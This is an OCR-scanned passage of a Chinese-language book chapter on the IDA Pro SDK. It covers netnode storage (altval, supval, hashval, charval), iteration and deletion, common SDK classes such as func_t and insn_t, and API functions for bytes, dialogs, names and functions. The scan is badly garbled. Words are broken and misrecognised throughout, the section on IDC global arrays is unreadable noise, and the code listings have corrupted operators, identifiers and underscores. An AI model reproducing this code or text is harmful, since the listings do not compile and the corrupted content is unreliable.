它们 的 应 用 示例 如 代码 清单 16-1 所 示 。 


代码 清单 16-1 声明 网 络 节点 

#ifdef EA64 ` 

typedef ulonglong nodeidx t; 

#else 

typedef ulong nodeidx t; 

#endif 

class netnode { 
netnode(); 
netnode(nodeidx t num); 
netnode(const char *name, size t namlen-0, bool do create-false); 
bool create(const char *name, size t namlen-O); 
bool create(); 
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//... remainder of netnode class follows 


n 

netnode n0; //uses& 
netnode n1(0x00401110); / /usese 
netnode n2("$ node 2"); //uses8 


netnode n3("$ node 3", 0, true); //usesO 


在 这 个 例子 中 ， 执 行 代 码 后 ， 效 据 库 中 只 存在 一 个 网 络 节 点 〈《n3 ) URBI rS nl 和 n2 
之 前 已 经 创建 并 且 填 充 有 数据 ， 它 们 可 能 会 存在 。 无 论 之 前 是 否 存在 ， 这 时 nl 都 能 接受 新 的 数 
ju. WAR n2 并 不 存在 ， 则 意味 着 你 不 可 能 在 数据 库 中 找到 名 为 $ node 2 WHAIA, MWA, 
必须 首先 显 式 创 建 nz (eue), 才能 将 数据 存储 到 这 个 市 点 中 。 如 果 硕 望 保 证 能 够 在 n2 中 存储 
数据 ， 我 们 需要 次 加 以 下 “安全 检查 ”: 











if (BADNODE -- (nodeidx t)n2) ( 
n2.create("$ node 2"); 
} 


前 面 的 例子 说 明了 nodeidx t 运算 符 的 用 法 ， 它 可 以 将 网 络 节点 转换 成 nodeidx t. 
nodeidx 鞋 运 算 符 只 返回 相关 网 络 节点 的 netnodenumber 数据 成 员 , 并 可 轻易 将 netnode 变量 转 
换 成 整数 。 

关于 网 络 节 点 ， 有 一 点 需要 注意 : 网 络 市 点 首先 必须 拥有 一 个 有 戏 的 netnodenumber， 然 后 你 
才能 在 该 网 络 节 点 中 存储 数据 。 如 上 面 例子 中 四 处 所 示 ， 和 上 ml 一 样 ，netnodenumber 可 以 通过 一 个 
构造 郴 数 显 式 分 配 。 另 外 ， 如 果 在 构造 晒 数 中 使 用 create 标志 ( 和 n3 一 样 ， 如 @ 处 所 示 )， 或 通 
过 create ( FI n2 一 样 ) 函数 创建 一 个 网 络 节点 ， 这 时 也 可 以 在 内 部 生成 一 个 netnodenumber。 内 部 
分 配 的 netnodenumber 以 0xFF000000 开头 ， 并 随 每 个 新 建 的 网 络 节 点 而 递增 。 

在 这 个 例子 中 ， 我 们 完全 忽略 了 网 络 节点 no MA, n) 既 没有 编号 也 没有 名 称 。 我 们 可 以 
使 用 create 函数 ， 以 和 创建 n2 类 似 的 方法 ,根据 名 称 创建 n0。 我 们 也 可 以 采用 男 一 种 形式 ， 用 
一 个 内 部 生成 的 有 效 的 netnodenumber 创建 一 个 未 命名 的 网 络 节 点 ， 如 下 所 示 : 

















nOo.create(); //assign an internally generated netnodenumber to nO 


这 样 ， 我 们 就 可 以 将 数据 存储 到 n0 中 ， 但 是 将 来 我 们 并 没有 办 法 检索 这 些 数 据 ， 除 非 我 们 
将 分 配给 它 的 netnodenumber 记录 在 某 个 地 方 , 或 者 给 n0 分 配 一 个 名 称 。 这 表示 如 有 果 网 络 市 点 与 
某 个 虚拟 地 址 关联 ( 类 似 于 例子 中 的 nl )， 我们 束 可 以 轻松 访问 这 个 节点 。 对 于 其 他 所 有 网 络 市 
点 ， 如 果 为 它们 分 配 名 称 ， 那么 我 们 就 可 以 对 将 来 的 所 有 网 络 节 点 引用 进行 具名 查询 ( 和 例子 中 
的 n2 和 n3 一 样 )。 

注意 , 对 于 已 命名 的 网 络 节 点 ,我 们 选择 使 用 以 “4 为 前 缀 的 名 称 , 这样 做 是 遵循 netnode.hpp 
文件 中 的 建议 ， 以 避免 与 IDA 内 部 使 用 的 名 称 造 成 冲突 。 

2. 网 络 节点 中 的 数据 存储 

现在 ,你 已 经 知道 如 何 创 建 一 个 可 用 于 存储 数据 的 网 络 节 点 。 下面, 我 们 回 过 头 来 讨论 网 络 
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方 点 中 的 内 部 数组 的 存储 能 力 ,在 将 一 个 值 存储 到 网 络 廊 点 中 的 数组 时 ,需要 指定 5 方面 的 信息 : 
一 个 索引 值 、 一 个 索引 大 小 (8 或 32 位 )、 一 个 每 存储 的 值 、 这 个 值 包含 的 字 方 数 以 及 一 个 用 于 
存储 这 个 值 的 数组 ( 每 类 256 个 数组 中 的 一 个 )。 索 引 大 小 参数 由 我 们 用 于 存储 或 检索 数据 的 也 
数 隐 式 指定 。 其 他 值 则 以 参数 形式 传递 给 孙 数 。 通 第 ,选择 将 一 个 值 存储 到 256 个 数组 中 的 哪 一 
个 数组 的 参数 叫做 标签 ( tag )， 它 一 般 使 用 一 个 字符 来 指定 ( 尽管 并 不 需要 如 此 )。 网 络 市 点 的 
文档 中 列 出 了 一 些 特殊 的 值 类 型 ， 它 们 分 别 是 altval, supval 和 hashval。 默 认 情 况 下 ， 每 一 类 值 
与 一 个 特定 的 数组 标签 关联 : 'A' 代 表 altval，'S fU supval，'H' 代 表 hashval。 第 4 类 值 叫做 
charval， 它 没有 任何 与 之 关联 的 数组 标签 。 

值得 注意 的 是 , 这 些 值 类 型 与 如 何 将 数据 存储 到 网 络 市 点 关联 更 大 , 而 与 网 络 方 点 中 某 个 特 
定 的 数组 关系 不 大 。 在 存储 数据 时 ,通过 指定 一 个 备用 的 数组 标签 ,你 可 以 将 任何 类 型 的 值 存储 
到 任何 数组 中 。 任何 时 候 , 你 都 需要 记 住 你 存储 到 某 个 特殊 数组 位 置 中 的 数据 的 类 型 ， 以 便 将 来 
使 用 适合 该 数据 类 型 的 检索 方法 。 

altval 提供 了 一 个 人 徐 单 的 接口 ， 可 用 于 存储 和 检索 网 络 节 点 中 的 整数 数据 。altval 可 存储 到 网 
络 节 点 中 的 任何 数组 中 ,但 默认 情况 下 ， 它 被 存储 到 'A' 数 组 中 。 不 省 你 希望 将 整数 存储 到 哪 一 
个 数组 中 ， 使 用 与 altval 有 关 的 函数 都 将 大 大 简化 存储 过 程 。 使 用 altval 存储 和 检索 数据 的 代码 
如 代码 清单 16-2 所 示 。 









































代码 清单 16-2 访问 网 络 方 点 altval 
netnode n("$ idabook", 0, true); //create the netnode if it doesn't exist 
sval t index - 1000; //sval t is a 32 bit type, this example uses 32-bit indexes 
ulong value - 0x12345678; 
n.altset(index, value);  //store value into the 'A' array at index 
value = n.altval(index); //retrieve value from the "A array at index 
n.altset(index, value, (char)3); //store into array 3 
value = n.altval(index, (char)3); //read from array 3 


在 这 个 例子 中 , 你 看 到 一 种 将 被 其 他 类 型 的 网 络 节点 值 重 复 使 用 的 模式 ， 即 使 用 MMXset ( 这 
里 为 altset ) 国 数 将 一 个 值 存 储 到 一 个 网 络 节 点 中 ， 并 使 用 XXXval (这 里 为 altval ) mäh 
络 节 点 中 检索 这 个 值 。 如 果 硕 望 使 用 8 位 索引 值 将 整数 存储 到 数组 中 , 我 们 需要 使 用 的 末 数 会 稍 
有 不 同 ， 如 下 面 的 例子 所 示 。 

















netnode n("$ idabook", O, true); 

uchar index - 80; //this example uses 8-bit index values 

ulong value - 0x87654321; 

n.altset idx8(index, value, 'A'); //store, no default tags with xxx idx8 functions 
value - n.altval idx8(index, 'A'); //retrieve value from the 'A' array at index 
n.altset idx8(index, value, (char)3); //store into array 3 

value = n.altval idx8(index, (char)3); //read from array 3 


从 这 个 例子 中 ， 你 看 到 ， 要 使 用 8 位 索引 值 ， 你 必须 使 用 一 个 以 _idx8 为 后 级 的 函数 。 还 要 
注意 的 是 ， 没 有 _idx8 函数 为 数组 标签 参数 提供 答 认 值 。 








要 在 网 络 节 点 中 存储 和 检索 数据 ，supval 提供 的 方法 最 多 。supval 可 表示 任意 大 小 的 数据 ， 
最 小 为 1 个 字 市 , 最 大 为 1024 个 字 市 。 使 用 32 位 索引 值 时 , 存储 和 检索 supval 的 默认 数组 为 'S' 
数组 , 但 是 , 通过 指定 一 个 适当 的 数组 标签 值 ， 同样 可 以 将 supval 存储 到 256 个 可 用 数组 中 的 任 
何 一 个 。 字符 串 是 一 种 常见 的 任意 长 度 的 数据 ,它们 可 由 操纵 supval 的 也 数 进行 特殊 人 处理。 代码 
清单 16-3 中 的 代码 说 明了 如 何 将 supval 存储 到 网 络 节 点 中 。 


代码 清单 16-3 ”存储 网 络 市 点 supval 


netnode n("$ idabook", O0, true); //create the netnode if it doesn't exist 











char *string data - "example supval string data"; 
char binary data[] = {0xfe, Oxdc, Ox4e, Oxc7, 0x90, 0x00, 0x13, Ox8a, 
0x33, 0x19, Ox21, Oxe5, Oxaa, Ox3d, Oxa1, 0x95]; 


//store binary data into the 'S' array at index 1000, we must supply a 
//pointer to data and the size of the data 
n.supset(1000, binary data, sizeof(binary data)); 


//store string data into the 'S' array at index 1001. If no size is supplied, 
//or size is zero, the data size is computed as: strlen(data) + 1 
n.supset(1001, string data); 

//store into an array other than 'S' (200 in this case) at index 500 
n.supset(500, binary data, sizeof(binary data), (char)200); 


这 里 的 supset 函数 需要 一 个 数组 索引 、 一 个 指 问 某 个 数据 的 指针 、 该 数据 的 长 度 (单位 为 
字 节 )、 一 个 数组 标签 ( 如 果 省 略 ， 则 默认 为 'S' )。 如 果 和 省 略 长 度 参数 ， 则 该 参数 默认 为 零 。 如 
果 指 定 长 度 为 零 , 则 supset 会 认为 所 存储 的 数据 是 一 个 字符 串 , 并 将 该 数据 的 长 度 计算 为 strlen 
(数据 ) +1， 并 将 一 个 雪 终 止 符 存 储 在 该 字符 串 数 据 的 后 面 。 

从 supval 中 检索 数据 需要 特别 小 心 , 因为 在 检索 数据 前 , 你 可 能 并 不 知道 该 supval 所 包含 的 
数据 的 数量 。 当 你 从 supval 中 检索 数据 时 , 字 市 从 网 络 节点 被 复制 到 一 个 用 户 提 供 的 输出 缓冲 区 
中 。 如 何 确 保 输出 缓冲 区 足够 大 ， 能 够 接收 所 有 的 supval 数据 呢 ? 第 一 种 方法 是 将 所 有 supval 
数据 复制 到 一 个 至 少 有 1024 个 字 节 大 小 的 缓冲 区 中 ; 第 二 种 方法 是 通过 查询 supval 的 大 小 ， 预 
先 设 置 输出 缓冲 区 的 大 小 。 有 两 个 函数 可 用 于 检索 supval。supval 函数 用 于 检索 任何 数据 ， 而 
supstr 函数 则 专门 用 于 检索 字符 串 数 据 。 在 使 用 这 两 个 图 数 时 , 你 需要 指定 一 个 指 回 你 的 输出 组 
冲 区 的 指针 ,同时 指定 该 缓冲 区 的 大 小 ,supval 函数 的 返回 值 是 复制 到 输出 缓冲 区 中 的 字 节 数量 ， 
而 supstr 函数 的 返回 值 则 是 复制 到 输出 缓冲 区 中 的 字符 串 的 长 度 ， 但 不 包括 零 终 止 符 ， 即 使 埠 
终止 符 被 复制 到 缓冲 区 中 。 这 两 个 函数 都 接受 一 个 特例 ， 即 用 NULL 指针 代替 输出 缓冲 区 指针 。 
在 这 种 情况 下 ，supval 和 supstr 返回 保存 supval 数据 所 需 的 字 节 数 (包括 任何 零 终止 符 ), 使 用 
supval 和 supstr 函数 检索 supval 数据 的 代码 如 代码 清单 16-4 Hr or. 


代码 清单 16-4 ”检索 网 络 厄 点 supval 
//determine size of element 1000 in 9 array. The NULL pointer indicates 
//that we are not supplying an output buffer 
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int len - n.supval(1000, NULL, 0); 


char *outbuf = new char[len]; //allocate a buffer of sufficient size 
n.supval(1000, outbuf, len);  //extract data from the supval 


//determine size of element 1001 in 'S' array. The NULL pointer indicates 
//that we are not supplying an output buffer. 
len = n.supstr(1001, NULL, 0); 


char *outstr = new char[len]; //allocate a buffer of sufficient size 
n.supval(1001, outstr, len);  //extract data from the supval 


//retrieve a supval from array 200, index 500 
char buf[1024]; 
len = n.supval(500, buf, sizeof(buf), (char)200); 


使 用 supval， 你 可 以 访问 存储 在 一 个 网 络 市 点 中 的 任何 数组 中 的 任何 数据 。 例 如 ， 通 过 将 
supset 和 supval 操作 限制 到 altval 的 大 小 ， 你 可 以 使 用 supval 哺 数 存储 和 检索 altval 数据 。 浏 览 
netnode.hpp 文件 ， 观 察 altset 函数 的 内 联 实 现 ( 如 下 所 示 )， 你 会 发 现 事 实 确实 如 此 : 





bool altset(sval t alt, nodeidx t value, char tag-atag) { 
return supset(alt, 8value, sizeof(value), tag); 


j 


hashval 提供 了 另 一 种 访问 网 络 节 点 的 接口 。 除 了 与 整数 索引 有 关外 ，hashval 还 与 密 钥 字符 
PAX EH hashset 函数 的 重 载 版 本 ， 可 以 轻 吻 地 将 整数 数据 或 数组 数据 与 一 个 散 列 密 钥 关联 
起 来 。 如 果 提 供 合 适 的 散 列 密 钥 ，hashval hashstr 和 hashval long 函数 可 用 于 检索 hashval。 
与 hashXXX 函数 有 关 的 标签 值 实际 上 选择 的 是 256 个 散 列 表 中 的 一 个 ,默认 散 列 表 为 'H' 指定 'H， 
以 外 的 标签 ， 可 以 选择 供奉 代 的 散 列 表 。 

我 们 提 到 的 最 后 一 个 访问 网 络 节点 的 接口 为 charval 接口 。charval 和 charset 函数 提供 了 一 
种 简单 的 方法 ， 可 以 在 网 络 市 点 数组 中 存储 单字 访 数据。 由 于 不 存在 与 charval 存储 和 检索 有 天 
的 默认 数组 ， 因 此 ， 你 必须 为 每 一 个 charval 操作 指定 一 个 数组 标签 。charval 存储 在 与 altval 和 
supval 相同 的 数组 中 ，charval EEN "TK 1 字 市 supval 的 包装 带 而 已 。 

netnode 类 提供 的 为 一 项 功能 是 它 能 够 遍历 网 络 市 点 数组 C 或 散 列 表 ) 的 内 容 。 遍 历 通 过 对 
altval 、supval hashval 和 charval D 2 DI XXX1st, XXXnst., XXXlast 和 XXXprev 图 数 执行 。 代 码 清 
Ff. 16-5 中 的 例子 说 明了 如 何 过 历 默认 的 altval 数 组 ('A' )。 


代码 清单 16-5” 枚 举 网 络 节点 altval 
netnode n("$ idabook", O, true); 
//Iterate altvals first to last 
for (nodeidx t idx = n.altist(); idx != BADNODE; idx = n.altnxt(idx)) { 
ulong val - n.altval(idx); 
msg("Found altval['A'][Xd] = %d\n", idx, val); 
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//Iterate altvals last to first 

for (nodeidx t idx = n.altlast(); idx != BADNODE; idx = n.altprev(idx)) { 
ulong val = n.altval(idx); 
msg("Found altval['A'][4d] = %d\n", idx, val); 

j 





遍历 supval hashval 和 charval 87732; 5388 JJ altval 的 方法 非 党 类似， 但是， 你 会 发 现 ， 所 
使 用 的 语法 因 被 访问 的 值 的 类 型 而 异 。 例 如 ， 通 历 hashval 将 返回 散 列 密 钥 而 非 数 组 索引 ， 然 后 
册 用 得 到 的 密 钥 检索 hashval。 


P3 2& T5 zx 5 IDC 全 局 数组 


Ej d EM OI Dr Hr BELL LEES TE D LE DC H ED (E JE MD DHL Hr Err LI (B. [8 E LE HI DAE E 
uuuullllibl I HEB U DE EI. IDC Createarray D] HELL LL D D DL B DE EE TE $ ide array E] E LL] 
uuuulllilil tiii itl li netnodenumber[] [] [] IDC 
HD DBBÓLBLHBLLIIDC SetArraybong UUUUUUUUUU alwalfj ^' indul 
SetArrayString [] EL] EL] EH E] E] E] E] E] DL] EL] supval] > ELE] E] E] E] E] E] E] U GetArrayE T ement [] 
DU IDCHIDUDBBBdgUutitilbliui^4RLONG[] AR STRITIT] altval[] supval [| 
Hr EHE RH UE COE ET D LED IO ED CD UE UT DE E E CO 

iuusBiuuuluuliuluslliillllii IDC[HHTH GU OD D B BLEEEEU B CE C] 
HET E ET JT TL E 23 H: LED E (ED E BD HD HL EE LEE HOH E 


3. TUER Pod 2873 ra A SR 
netnode 类 还 提供 用 于 删除 各 数组 元 系 、 全 部 数组 内 容 或 全 部 网 络 市 点 内 容 的 函数 。 删 除 整 
个 网 络 市 点 的 过 程 相当 休 单 。 

















netnode n("$ idabook", O, true); 
n.kill(); //entire contents of n are deleted 


在 删除 各 数组 元 又 或 全 部 数组 内 容 时 , PUDE E36 2A BIER PRG, DSL TOES KR e Er 
第 相似 。 如 果 选 择 了 错误 的 也 数 ,可 能 会 导 人 至 大量 数据 丢失 。 下面 沉 有 注释 的 例子 说 明了 如 何 删 
除 altval: 


netnode n("$ idabook", O, true); 


0 n.altdel(100); //delete item 100 from the default altval array ('A') 
n.altdel(100, (char)3); //delete item 100 from altval array 3 

© n.altdel(); //delete the entire contents of the default altval array 
n.altdel all('A'); //alternative to delete default altval array contents 


n.altdel all((char)3); //delete the entire contents of altval array 3; 


请 注意 ， 删 除 默 认 altval 数 组 全 部 内 容 ( @ ) 所 使 用 的 语法 ， 与 删除 默认 altval 数组 中 一 个 元 
A Le) 所 使 用 的 语法 非常 相似 。 如 果 在 删除 一 个 数组 元 素 时 ， 因 为 某 种 原因 你 没有 指定 一 个 索 
引 ， 那 么 ， 最 终 你 可 能 会 删除 整个 数组 。 删 除 supval charval 和 hashval 数据 的 函数 也 与 之 类 似 。 
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16.2.3 ”有 用 的 SDK 数 据 类 型 


IDA 的 API 定义 了 许多 C++ 类 , 专门 模拟 可 执行 文件 中 的 各 个 组 件 。SDK 中 包含 大 量 类 ， 
用 于 描述 函数 、 程 序 闻 、 数 据 结 构 、 各 汇编 语言 指令 以 及 每 条 指令 中 的 各 操作 数 。SDK 还 定 
义 了 其 他 类 ， 以 实现 IDA 用 于 管理 反 汇 编 过 程 的 工具 。 后 一 种 类 型 的 类 定义 数据 库 的 一 般 特 
点 、 加 载 需 模块 的 特点 、 处 理 需 模块 的 特点 和 插件 模块 的 特点 以 及 每 条 反 汇 编 指令 所 使 用 的 
汇编 语法 。 
下 面 介 绍 了 一 些 较为 常见 的 通用 类 。 在 后 面 几 革 中 ,我 们 将 讨论 特定 于 插件 、 加 载 益 和 处理 
各 模 块 的 类 。 本 市 主要 介绍 一 些 类 、 它 们 的 作用 以 及 每 个 类 中 一 些 重要 的 数据 成 员 。 操 纵 每 个 类 
所 使 用 的 函数 将 在 16.2.4 节 中 介绍 。 
O area t (area.hpp )。 这 个 结构 体 描述 一 系列 地 址 ， 并 且 是 其 他 几 个 类 的 基 类 。 该 结构 体 包 
含 两 个 数据 成 员 : startEA( 包括 ) 和 endEA (不 包括 )， 它 们 定义 地 址 范围 的 边界 。 该 结 
构 体 还 定义 了 一 些 成 员 函 数 ， 以 计算 地 址 范围 的 大 小 。 这 些 函 数 还 可 以 对 两 个 区 域 进行 
比较 。 
O func t ( func.hpp )。 这 个 类 从 area t 继 承 而 来 ,其 中 添加 了 其 他 一 些 数据 字段 以 记录 隆 
数 的 二 进 制 属性 ， 如 浮 数 是 否 使 用 帧 指针 ， 还 记录 了 描述 函数 的 局 部 变量 和 参数 的 属 
性 。 为 了 进行 优化 ， 一 些 编译 硕 可 能 会 将 图 数 分 割 成 一 个 二 进 制 文件 中 的 几 个 互 不 相 
邻 的 区 域 。IDA 把 这 些 区 域 叫做 块 ( chuck ) KÆ ( tail ). func. t 类 也 用 于 描述 尾 块 tail 
chunk ). 
D segment t (segmenthpp ). segment t 类 是 area tt 的 另 一 个 子 类 ， 其 中 添加 了 一 些 数据 字 
段 ， 以 描述 段 的 名 称 、 段 中 可 用 的 权限 ( 可 读 、 可 写 、 可 执行 )、 段 的 类 型 ( 代码、 数据 
等 )、 一 个 段 地 址 所 使 用 的 位 数 (16、32 或 64 位 )。 
Q idc value t (expr.hpp )。 这 个 类 描述 一 个 IDC 值 的 内 容 ， 任 何 时 候 它 都 可 能 包含 一 个 字 
符 串 、 一 个 整数 或 一 个 浮 点 值 。 当 与 一 个 已 编译 模块 中 的 IDC 也 数 交互 时 ， 其 类 型 被 大 
量 使 用 。 
Q idainfo (ida.hpp )。 这 个 结构 体 用 于 描述 开放 数据 库 的 特点 。ida.hpp 文 件 声明 了 唯一 一 
个 名 为 inf 的 idainfo 全 局 变量 。 这 个 结构 体 中 的 字段 描述 所 使 用 的 处 理 融 模 块 的 名 称 、 输 
人 和信 文件 类 型 ( 如 通过 filetype t 枚 举 得 到 的 f PE 或 f MACHO )、 程 序 进 入 点 (beingEA). — 
进 制 文件 中 的 最 小 地 址 (minEA 入 二进制 文件 中 的 最 大 地 址 (maxEA)、 当 前 处 理 硕 的 字 他 
顺序 (mf ) 以 及 通过 解析 ida.cfg 得 到 的 许多 配置 设置 。 
O struc t (structhpp )。 这 个 类 描述 反 汇 编 代码 清单 中 结构 化 数据 的 布局 。 它 用 于 描 
述 .Structures 窗 口中 的 结构 体 以 及 函数 栈 帧 的 构成 。struc t 中 包含 描述 结构 体 属性 ( 如 它 
是 结构 体 还 是 联合 , 该 结构 体 在 IDA 显 示 窗 口中 处 于 折 靶 还 是 打开 状态 ) 的 标志 ， 其 中 还 
包括 一 个 结构 体 成 员 数 组 。 
D member t ( struct.hpp )。 这 个 类 描述 唯一 一 个 结构 化 数据 类 型 成 员 ， 其 中 的 数据 字段 描述 
该 成 员 在 它 的 父 结构 体 中 的 起 始 和 结束 位 置 的 字 市 偏 移 量 。 
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O op t (ua.hpp )。 这 个 类 摘 述 经 过 反 汇 编 的 指令 中 的 一 个 操作 数 。 这 个 类 包含 一 个 以 零 为 


基数 的 字段 , 用 于 存储 操作 数 数量 (n). 一 个 操作 数 类 型 字段 (type ) 以 及 其 他 许多 字段， 
它们 的 作用 因 操 作 数 的 类 型 而 异 。type 字 段 被 设 定 为 在 ua.hpp 文 件 中 定义 的 一 个 optype t 
常量 ， 用 于 描述 操作 数 类 型 或 操作 数 使 用 的 寻 址 模式 。 

insn t (ua.hpp )。 这 个 类 中 包含 描述 一 条 经 过 反 汇 编 的 指令 的 信息 。 这 个 类 中 的 字段 描 
述 该 指令 在 反 汇 编 代码 清单 中 的 地 址 Cea )、 该 指令 的 类 型 ( itype )、 该 指令 的 字 节 长 度 
(size )、 一 个 可 能 由 6 个 op t 类 型 的 操作 数 数 值 ( 0perand ) 构成 的 数组 (IDA 限制 每 条 指 
令 最 多 使 用 6 个 操作 数 ), itype 字 段 由 处 理 需 模块 设置 .对 于 标准 的 IDA 处 理 需 模块 , itype 
字段 被 设 定 为 在 allins.hpp 文 件 中 定义 的 一 个 枚 举 和 常量 。 如果 使 用 第 三 方 处 理 器 模块 , 则 必 
须 从 模块 开发 者 那里 获得 潜在 itype 值 的 列表 。 需要 注意 的 是 ，itype 字 段 通 常 与 该 指令 的 
二 进 制 操作 码 无 关 。 


























上 面 并 没有 列 出 SDK 所 使 用 的 全 部 数据 类 型 ， 它 仅仅 介绍 了 一 些 较为 常用 的 类 ， 以 及 这 些 
类 中 的 一 些 较为 常用 的 字段 。 
16.2.4 *SRBJSDKERZN 

虽然 SDK 使 用 C++ 编程 ， 并 定义 了 大 量 C++ 类 ， 但 在 许多 时 候 ，SDK 更 倾向 于 使 用 C 
风格 的 非 成 员 函 数 来 操纵 数据 库 中 的 对 象 。 对 于 多 数 API 数据 类 型 ，SDK SITE: Ge 
数 ( 它们 需要 一 个 指 癌 某 个 对 象 的 指针 ) 而 不 是 以 你 期 望 的 方式 操纵 对 象 的 成 员 晒 数 来 处 理 


它们 O 








在 下 面 的 总 结 中 ， 我们 将 介绍 许多 API 旺 数 ， 它 们 提供 的 功能 与 第 15 章 中 讨论 的 许多 IDC 
也 数 的 功能 类 似 。 可 惜 ， 在 IDC 和 APIP, 执行 相 同 任务 的 函数 的 名 称 并 不 相同 。 
1. 基本 数据 库 访问 











下 面 的 函数 由 bytes.hpp 文件 声明 ， 使 用 它们 可 以 访问 数据 库 中 的 各 个 字 节 、 字 和 双 字 。 


LI 





uchar get byte(ea t addr),， 读 取 虚 拟 地 址 addr 处 的 当前 学 市 值 。 





口 ushort get word(ea t addr)， 读 取 虚 拟 地 址 addr 处 的 当前 字 值 。 


LI UU U 


ulong get long(ea t addr)， 读 取 虚 拟 地 址 addr 人 处 的 当前 双 字 值 。 

get many bytes(ea t addr, void *buffer, ssize t len)， 从 addr 复 制 1len 个 字 市 到 提供 
的 缓冲 区 中 。 

patch byte(ea t addr, ulong val)， 在 虚拟 地 址 addr 人 处 设置 一 个 字 市 值 。 

patch word(1ong addr, ulonglong val)， 在 虚拟 地 址 addr 处 设置 一 个 字 值 。 

patch long(long addr, ulonglong val)， 在 虚拟 地 址 addr 人 处 设置 一 个 双 字 值 。 

patch many bytes(ea t addr, const void *buffer, size t len)， 用 用 户 提供 的 buffer 
中 的 1en 个 字 市 修补 以 addr 开 头 的 数据 库 。 

ulong get original byte(ea t addr)， 读 取 虚 拟 地 址 addr 处 的 初始 字 方 值 ( 修补 之 前 )。 
ulonglong get original word(ea t addr)， 读 取 虚 拟 地 址 addr 处 的 初始 字 值 。 

ulonglong get original long(ea t addr)， 读 取 虚 拟 地 址 addr 处 的 初始 双 字 值 。 











16.2 IDA 应 用 编程 接口 239 





D bool isLoaded(ea t addr)， 如 果 addr 包 含有 效 数据 ， 则 返回 真 ， 否 则 返回 假 。 

还 有 其 他 函数 可 用 于 访问 其 他 数据 大 小 。 需要 注意 的 是 ，get original XXX 函数 读 取 的 是 第 
一 个 初始 值 ， 它 不 一 定 是 修补 之 前 位 于 某 个 地 址 处 的 值 。 例 如 ， 如 果 一 个 字 节 值 被 修补 两 次 , 那 
么 ,在 整个 过 程 中 ， 这 个 字 节 就 保存 了 3 个 不 同 的 值 。 在 第 二 次 修补 后 ， 我 们 可 以 访问 当前 值 和 
初始 值 ， 但 没有 办 法 访问 第 二 个 值 ( 它 由 第 一 个 补丁 设置 )。 

2. FH P e ER E 

H IDA 用 户 界 面 的 交互 由 唯一 一 个 名 为 callui 的 调度 函数 处 理 。 向 callui 传递 一 个 用 户 界 
面 请 求 〈 其 中 一 个 枚 举 ui notification t 4*5) 以 及 该 请 求 所 需 的 其 他 参数 ， 即 可 提出 各 种 用 
户 界面 服务 请 求 。 每 种 请 求 所 需 的 参数 由 kernwin.hpp 文件 指定 。 不 过 kernwin.hpp 文件 还 定义 了 
大 量 便捷 函数 (convenience function )， 只 是 这 些 函 数 隐藏 了 许多 直接 使 用 callui 的 细节 。 下 面 
是 几 个 常见 的 便捷 函数 。 

O msg(char *format, ...)， 在 消息 窗口 中 打印 一 条 格式 化 消息 。 这 个 吨 数 类 似 于 C 的 printf 

国 数 ， 接 受 一 个 printf 风 格 的 格式 化 字符 串 。 

D warning(char *format ，...)， 在 一 个 对 话 框 中 显示 一 条 格式 化 消息 。 

口 char *askstr(int hist, char *default, char *format, ...), 显示 一 个 输入 框 ， 要求 用 
户 输入 一 个 字符 串 值 。 hist 参 数 指出 如 何 写 和 输入 框 中 的 下 拉 历 史记 录 列 表 , 并 它 将 设置 
为 kernwin.hpp 定 义 的 一 个 HIST_xxx 和 常量 。 format 字 符 串 和 任何 其 他 参数 用 于 构成 一 个 提示 
"FR (prompt string )。 

口 char *askfile c(int dosave, char *default, char *promppt，...)， 显 示 一 个 “保存 文件 ” 
( dosave=1 ) 或 “打开 文件 ”( dosave=0 ) 对 话 杠 , 最 初 显 示 默 认 指 定 的 目录 和 文件 掩 码 (如 
C:\\windows\\*.exe ), 返回 选 定 文件 的 名 称 。 如 末 对 话 框 被 取消 ， 则 返回 NULL. 

D askyn cCint default, char *prompt，...)， 用 一 个 答案 为 “是 ”或 “ 否 ” 的 问题 提示 用 户 ， 

突出 显示 一 个 默认 的 答案 (1 为 是 ，0 为 否 ，-1 为 取消 ) 返回 一 个 表示 所 选 答案 的 整数 。 

口 AskUsingForm c(const char *form, ...), form 参数 是 一 个 对 话 框 及 其 相关 输入 元 素 的 

ASCI 字符 串 规 范 。 如 果 SDK 的 其 他 便捷 也 数 无 法 满足 你 的 要 求 ， 这 个 函数 可 用 于 构建 
HE X HIP HICK form 字符 串 的 格式 由 kernwin.hpp 文件 详细 说 明 。 

O get screen eat), 返回 当前 光标 所 在 位 置 的 虚拟 地 址 。 

口 jumpto(ea t addr), 使 反 汇编 窗 口 跳 转 到 指定 地 址 。 

与 IDC 脚本 相 比 ， 使 用 API 能 够 实现 更 多 的 用 户 界 面 功 能 ， 包 括 创建 自 定义 单列 和 多 列 的 
列表 选择 对 话 框 ,对 这 些 功 能 感 兴趣 的 读者 可 以 参阅 kernwin.hpp 文件 , 特别 是 choose 和 choose2 

3. 操纵 数据 库 名 称 

下 面 的 水 数 可 用 于 处 理 数据 库 中 的 已 命名 位 置 。 

O get name(ea t from, ea t addr, char *namebuf, size t maxsize), 返回 与 addr 有 关 的 名 

称 。 如 采 该 位 置 没 有 名 称 ， 则 返回 空 学 符 串 。 如 有 果 from 是 包含 addr 的 函数 中 的 任何 地 址 ， 
这 个 函数 可 用 于 访问 局 部 名 称 。 返 回 的 名 称 被 复制 到 函数 提供 的 输出 缓冲 区 中 。 
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口 set name(ea t addr, char *name, int flags)， 辣 给 定 的 地 址 分 配给 定 的 名 称 。 该 名 称 使 用 
在 flags 位 掩 码 中 指定 的 属性 创建 。 要 了 解 可 能 的 标志 值 ， 请 参 几 name.hpp 文 件 。 
D get name ea(ea t funcaddr, char *localname)， 在 包含 funcaddr 的 函数 中 搜索 给 定 的 局 
部 名 称 。 如 琳 在 给 定 的 函数 中 不 存在 这 样 的 名 称 ， 则 返回 BADADDR ( -1 )。 
4. 操纵 函数 
访问 与 经 过 反 汇 编 的 晒 数 有 关 的 信息 的 API 函数 在 funcs.hpp 中 声明 。 访 问 栈 帧 信息 的 咀 数 
在 frame.hpp 中 声明 。 下 面 介 绍 一 些 较 为 第 用 的 函数 。 
口 func t *get func(ea t addr)， 返 回 一 个 指 回 func t 对 象 的 指针 ， 该 对 和 象 描述 包含 指定 地 
址 的 函数 。 
O size t get func qty()， 返回 在 数据 库 中 出 现 的 函数 的 数量 。 
口 func t *getn func(size t n)， 人 返回 一 个 指 癌 func t 对 象 的 指针 ，func t 对 象 代表 数据 库 
中 的 第 n 个 函数 ， 这 里 的 n 介 于 稚 (包括 ) 和 get func qty()( 不 包括 ) 之 间 。 
口 func t *get next func(ea t addr), 返回 一 个 指 回 strnc t 对 象 的 指针 ，strnc OUI AR TIS 
指定 地 址 后 面 的 下 一 个 函数 。 
